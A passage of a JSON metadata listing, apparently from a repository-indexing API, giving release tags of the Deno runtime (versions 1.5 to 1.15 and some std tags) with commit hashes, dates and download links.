oad.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","publ